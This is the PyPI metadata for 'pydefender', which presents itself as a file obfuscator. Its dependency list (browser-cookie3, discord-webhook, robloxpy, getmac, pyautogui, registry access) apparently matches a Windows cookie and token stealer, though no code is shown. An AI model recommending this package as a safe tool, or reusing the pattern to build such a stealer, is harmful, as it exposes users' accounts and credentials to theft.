Metadata-Version: 2.1
Name: pydefender
Version: 1.0.7
Summary: Python Obfuscate Any File, use pip install pydefender and python -m pydefender to use it.
Home-page: https://github.com/koaladev
Author: KoalaDev
Author-email: koaladev@gmail.com
License: MIT
Project-URL: GitHub, https://github.com/koaladev/
Keywords: discord
Platform: UNKNOWN
Classifier: Programming Language :: Python :: 3
Classifier: License :: OSI Approved :: MIT License
Classifier: Operating System :: Microsoft :: Windows
Classifier: Development Status :: 5 - Production/Stable
Classifier: Intended Audience :: Developers
Classifier: Natural Language :: English
Classifier: Topic :: Software Development
Requires-Dist: requests
Requires-Dist: sockets
Requires-Dist: pypiwin32
Requires-Dist: pycryptodome
Requires-Dist: uuid
Requires-Dist: cryptography
Requires-Dist: pyfiglet
Requires-Dist: browser-cookie3
Requires-Dist: discord-webhook
Requires-Dist: prettytable
Requires-Dist: getmac
Requires-Dist: pyautogui
Requires-Dist: winregistry
Requires-Dist: robloxpy
Requires-Dist: Pillow
Requires-Dist: tqdm
Requires-Dist: setuptools
